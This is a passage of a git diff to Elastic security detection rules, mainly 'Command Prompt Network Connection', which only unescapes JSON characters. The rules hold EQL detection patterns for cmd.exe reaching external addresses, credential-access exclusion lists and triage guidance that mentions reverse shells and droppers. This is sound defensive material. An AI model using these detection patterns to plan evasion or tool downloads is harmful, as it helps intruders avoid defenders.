\"?:\\\\Program Files (x86)\\\\SuperScan\\\\scanner.exe\",\n \"?:\\\\Program Files (x86)\\\\Zscaler\\\\ZSATunnel\\\\ZSATunnel.exe\",\n \"?:\\\\Windows\\\\System32\\\\lsass.exe\",\n \"?:\\\\Windows\\\\System32\\\\MicrosoftEdgeCP.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\vmnat.exe\",\n \"?:\\\\Windows\\\\SystemApps\\\\Microsoft.MicrosoftEdge_*\\\\MicrosoftEdge.exe\",\n \"System\"\n ) and process.code_signature.trusted == true\n ) and\n destination.address != \"127.0.0.1\" and destination.address != \"::1\"\n", "related_integrations": [ { "package": "endpoint", @@ -71,7 +71,7 @@ ], "risk_score": 47, "rule_id": "897dc6b5-b39f-432a-8d75-d3730d50c782", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -83,7 +83,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/89f9a4b0-9f8f-4ee0-8823-c4751a6d6696_102.json b/packages/security_detection_engine/kibana/security_rule/89f9a4b0-9f8f-4ee0-8823-c4751a6d6696_102.json index 22a6d37e93d..f7e84f34749 100644 --- a/packages/security_detection_engine/kibana/security_rule/89f9a4b0-9f8f-4ee0-8823-c4751a6d6696_102.json +++ b/packages/security_detection_engine/kibana/security_rule/89f9a4b0-9f8f-4ee0-8823-c4751a6d6696_102.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/89f9a4b0-9f8f-4ee0-8823-c4751a6d6696_103.json b/packages/security_detection_engine/kibana/security_rule/89f9a4b0-9f8f-4ee0-8823-c4751a6d6696_103.json index c19c74fa754..8925f94a34a 100644 --- a/packages/security_detection_engine/kibana/security_rule/89f9a4b0-9f8f-4ee0-8823-c4751a6d6696_103.json +++ b/packages/security_detection_engine/kibana/security_rule/89f9a4b0-9f8f-4ee0-8823-c4751a6d6696_103.json @@ -16,7 +16,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Command Prompt Network Connection", - "note": "## Triage and analysis\n\n### Investigating Command Prompt Network Connection\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using a command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThis rule looks for a network connection to an external address from the `cmd.exe` utility, which can indicate the abuse of the utility to download malicious files and tools.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Examine if any file was downloaded and check if it is an executable or script.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the downloaded file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and file name conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Command Prompt Network Connection\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using a command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThis rule looks for a network connection to an external address from the `cmd.exe` utility, which can indicate the abuse of the utility to download malicious files and tools.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Examine if any file was downloaded and check if it is an executable or script.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the downloaded file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and file name conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and process.name : \"cmd.exe\" and event.type == \"start\"]\n [network where host.os.type == \"windows\" and process.name : \"cmd.exe\" and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\",\n \"192.0.0.171/32\", \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\",\n \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\", \"192.175.48.0/24\",\n \"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\n \"FE80::/10\", \"FF00::/8\")]\n", "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -86,7 +86,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/89f9a4b0-9f8f-4ee0-8823-c4751a6d6696_104.json b/packages/security_detection_engine/kibana/security_rule/89f9a4b0-9f8f-4ee0-8823-c4751a6d6696_104.json index 7edcee49fd9..df213d4339f 100644 --- a/packages/security_detection_engine/kibana/security_rule/89f9a4b0-9f8f-4ee0-8823-c4751a6d6696_104.json +++ b/packages/security_detection_engine/kibana/security_rule/89f9a4b0-9f8f-4ee0-8823-c4751a6d6696_104.json @@ -16,7 +16,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Command Prompt Network Connection", - "note": "## Triage and analysis\n\n### Investigating Command Prompt Network Connection\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using a command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThis rule looks for a network connection to an external address from the `cmd.exe` utility, which can indicate the abuse of the utility to download malicious files and tools.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Examine if any file was downloaded and check if it is an executable or script.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the downloaded file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and file name conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Command Prompt Network Connection\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using a command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThis rule looks for a network connection to an external address from the `cmd.exe` utility, which can indicate the abuse of the utility to download malicious files and tools.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Examine if any file was downloaded and check if it is an executable or script.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the downloaded file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and file name conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and process.name : \"cmd.exe\" and event.type == \"start\"]\n [network where host.os.type == \"windows\" and process.name : \"cmd.exe\" and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\",\n \"192.0.0.171/32\", \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\",\n \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\", \"192.175.48.0/24\",\n \"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\n \"FE80::/10\", \"FF00::/8\")]\n", "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", @@ -85,7 +85,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/89f9a4b0-9f8f-4ee0-8823-c4751a6d6696_105.json b/packages/security_detection_engine/kibana/security_rule/89f9a4b0-9f8f-4ee0-8823-c4751a6d6696_105.json index 6411a79686e..86278b2d92b 100644 --- a/packages/security_detection_engine/kibana/security_rule/89f9a4b0-9f8f-4ee0-8823-c4751a6d6696_105.json +++ b/packages/security_detection_engine/kibana/security_rule/89f9a4b0-9f8f-4ee0-8823-c4751a6d6696_105.json @@ -16,7 +16,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Command Prompt Network Connection", - "note": "## Triage and analysis\n\n### Investigating Command Prompt Network Connection\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using a command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThis rule looks for a network connection to an external address from the `cmd.exe` utility, which can indicate the abuse of the utility to download malicious files and tools.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Examine if any file was downloaded and check if it is an executable or script.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the downloaded file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and file name conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Command Prompt Network Connection\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using a command and control channel. However, they can also abuse signed utilities to drop these files.\n\nThis rule looks for a network connection to an external address from the `cmd.exe` utility, which can indicate the abuse of the utility to download malicious files and tools.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n - Investigate the file digital signature and process original filename, if suspicious, treat it as potential malware.\n- Investigate the target host that the signed binary is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Examine if any file was downloaded and check if it is an executable or script.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the downloaded file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of destination IP address and file name conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and process.name : \"cmd.exe\" and event.type == \"start\"]\n [network where host.os.type == \"windows\" and process.name : \"cmd.exe\" and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\",\n \"192.0.0.171/32\", \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\",\n \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\", \"192.175.48.0/24\",\n \"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\n \"FE80::/10\", \"FF00::/8\")]\n", "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", 